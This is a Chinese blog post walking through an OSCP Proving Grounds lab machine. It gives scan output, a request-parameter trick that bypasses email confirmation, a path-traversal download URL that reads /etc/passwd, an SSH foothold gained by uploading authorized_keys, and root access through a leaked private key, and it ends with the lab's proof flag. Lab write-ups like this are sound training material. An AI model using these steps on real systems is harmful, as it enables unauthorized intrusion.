OSCP - Proving Grounds - Crane

最新推荐文章于 2025-08-05 23:58:52 发布

柴郡猫^O^

最新推荐文章于 2025-08-05 23:58:52 发布

阅读量259

点赞数 3

CC 4.0 BY-SA版权

分类专栏： OSCP 文章标签：网络安全安全性测试安全

本文链接：https://blog.youkuaiyun.com/N61320/article/details/143939478

OSCP 专栏收录该内容

75 篇文章

订阅专栏

主要知识点

request/response参数更改
filemanager 路径更改
ssh密钥登录/提权

具体步骤

先执行nmap扫描

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 03:26 UTC
Nmap scan report for 192.168.54.231
Host is up (0.00048s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 37:80:01:4a:43:86:30:c9:79:e7:fb:7f:3b:a4:1e:dd (RSA)
|   256 b6:18:a1:e1:98:fb:6c:c6:87:55:45:10:c6:d4:45:b9 (ECDSA)
|_  256 ab:8f:2d:e8:a2:04:e7:b7:65:d3:fe:5e:93:1e:03:67 (ED25519)
80/tcp    open   http
| http-title: Boolean
|_Requested resource was http://192.168.54.231/login
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     HTTP/1.1 400 Bad Request
|   FourOhFourRequest, GetRequest, HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Content-Type: text/html; charset=UTF-8
|_    Content-Length: 0
3000/tcp  closed ppp
33017/tcp open   http    Apache httpd 2.4.38 ((Debian))
|_http-title: Development
|_http-server-header: Apache/2.4.38 (Debian)

80和33017端口都查看一下，应该是80端口比较有价值

不过这里先执行一下路径爆破先,有filemanager,也就是说可以实现RCE或者LFI

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.175.231
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/quickhits.txt
[+] Negative Status codes:   503,502,404,429
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/filemanager          (Status: 302) [Size: 94] [--> http://192.168.175.231/login]
/filemanager/         (Status: 302) [Size: 94] [--> http://192.168.175.231/login]
/login                (Status: 200) [Size: 2413]
/login.php            (Status: 200) [Size: 2413]
/register.php         (Status: 200) [Size: 2765]
Progress: 2565 / 2566 (99.96%)
===============================================================
Finished
===============================================================

先打开burpsuite在登录页面注册一个用户tim1,发现会有如下请求和响应,看起来如果confirmed=false,就会一直无法登录成功，不过直接拦截response更改成true是不好用的

不过response里不行，我们可以尝试一下更改请求里的参数，添加user%5Bconfirmed=true则会成功跳过邮箱验证这一步

这里我原本准备上传一个php文件来创建reverse shell,但是好像只能下载不能访问，只能看其他的方法,经过下载依次文件后，发现可以编辑URL，http://192.168.108.231/?cwd=../../../../../etc&file=passwd&download=true来达到LFI的功能，并且也发现了remi用户

更改路径则可以遍历/home/remi下的文件，其中keys中包含很多密钥，root/id_rsa，(即使下载下来也没办直接使用key登录），不过我们可以生成一个key pair，并在.ssh路径下面上传一个authorized_keys文件来实现ssh登录

C:\home\kali\Documents\OFFSEC\GoToWork\Bool> ssh -i id_ed25519 remi@192.168.108.231
Linux boolean 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Nov 20 22:35:11 2024 from 192.168.45.160
remi@boolean:~$

应该还记得.ssh/keys路径下的root文件吧，利用它可以实现提权，但是这里需要添加-o IdentityAgent=none,否则会报错 Too Many authentication failures,

remi@boolean:~/.ssh/keys$ ssh -i root root@127.0.0.1
Received disconnect from 127.0.0.1 port 22:2: Too many authentication failures
Disconnected from 127.0.0.1 port 22
remi@boolean:~/.ssh/keys$ ssh -o IdentityAgent=none -i root root@127.0.0.1
Linux boolean 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Nov 20 22:47:29 2024 from 127.0.0.1
root@boolean:~# cat /root/proof.txt
9179ea87c40a2ae93f0e1c65fc06065a
root@boolean:~#